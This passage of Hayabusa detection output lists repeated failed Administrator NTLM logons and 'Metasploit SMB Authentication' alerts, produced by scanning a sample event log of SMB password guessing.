Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wGfoObbN8ioefyce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iLHhCgHvmOzoLLqG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9KL69y47DMyFOWT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ECuVYiqdMw2dMjT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YJCYumRekD7AREYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0H4OxKzoemZrsosT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSHnvxa0khWdWBVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bJkPp0bghDCPYz52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SfHRWGXjCej9HSPb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X42H7EvrvzsRqXWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moo42NdOq30Gnz3T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4NHVYxxDkCOsQw8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iPUiW0vFQB405kwS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OtcZ4ymkeLHeU7YJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxZCDKWtqkGJ0dnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f4GGnhttZgmRPRJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gI0j9w45eXEFeex3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BVZ2YRDUAOsNgKxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJfIpxlcwVf7pWga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Oerixd9ODF6fslsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJC5yvrIymYgaHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4schZcUP8Im8Ee1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WotargyGlEq9PBch : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2JSMrPoucOR0nzlD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jr4w4uoF2DVZ5n9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v319oZIaOBpuf542 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GNRTL9BLlGWMx6dA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHlDIOZ9B5uY8Rzz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dr2bvAue8mr5kagX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXBds9GoXr6IZUfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLYuegjXO18lo342 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: To3MMEEvNXKNjKHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N0HCToTmh3ESGBYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nNvBueVo3ANNmSSN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVWOoAG5ermGL2Gl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W7QYJUNPm5b4jprh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PHllwNJvpH3P97cp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tfT8GtafHGYMlkMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nab7wtZfBVkcynsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHiijj7sT9nyqxii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v06kkhqYNOyEHx2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WSTDX16YK5Zgkjxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u6QWEyTrpndCagP0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7iCaXa5SR5IHJnQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DNZhcPd1JaNFZMYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LeOIg10KS60QplWz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: um3Nwo2doDbKJJvz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 